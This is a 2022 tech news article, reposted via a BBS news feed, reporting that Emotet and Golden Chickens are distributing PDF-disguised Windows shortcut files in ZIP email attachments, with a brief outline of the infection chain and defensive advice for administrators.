Uh oh, malicious Windows shortcuts are making a return
Date:
Wed, 22 Jun 2022 19:24:22 +0000
Description:
Dangerous Windows shortcuts are being dressed up as PDF files in a new Emotet campaign.
FULL STORY ======================================================================
At least two threat actors have recently been observed distributing malicious Windows shortcut files designed to infect victims with malware .
Late last week, cybersecurity researchers from Varonis reported seeing the dreaded Emotet threat actor, as well as the lesser-known Golden Chickens
group (AKA Venom Spider), distributing .ZIP archives via email, and in those archives, .LNK files.
Using Windows shortcut files to deploy malware or ransomware on the target endpoint is not exactly novel, but these threat actors have given the idea a brand new spin.
Share your thoughts on Cybersecurity and get a free copy of the Hacker's Manual 2022 . Help us find how businesses are preparing for the post-Covid world and the implications of these activities on their cybersecurity plans. Enter your email at the end of this survey to get the bookazine, worth $10.99/10.99. Shortcuts posing as PDF files
The majority of older readers are probably guilty of customizing their game desktop shortcuts in the past, at least on one occasion.
In this particular campaign, the threat actors replaced the original shortcut icon with that of a .PDF file, so that the unsuspecting victim, once they receive the email attachment, cant spot the difference with a basic visual inspection. Read more
Hackers have found a sneaky new way to infect Windows devices
Google Chrome user profiles under attack from Emotet malware
Emotet malware is back, and potentially nastier than ever
But the danger is real. Windows shortcut files can be used to drop pretty
much any malware onto the target endpoint, and in this scenario, the Emotet payload is downloaded into the victims %TEMP% directory. If successful, the Emotet payload will be loaded into memory using regsvr32.exe, while the original dropper gets deleted from the %TEMP% directory.
The best way to protect against these attacks, researchers are saying, is to thoroughly inspect every email attachment coming in, and to quarantine and block any suspicious content (that includes ZIP-compressed files with Windows shortcuts).
Admins should also restrict the execution of unexpected binaries and scripts from the %TEMP% directory, and limit user access to Windows scripting engines such as PowerShell and VBScript. They should also enforce the need for
scripts to be signed via Group Policy.
======================================================================
Link to news story:
https://www.techradar.com/news/uh-oh-malicious-windows-shortcuts-are-making-a- return/
--- Mystic BBS v1.12 A47 (Linux/64)
* Origin: tqwNet Technology News (1337:1/100)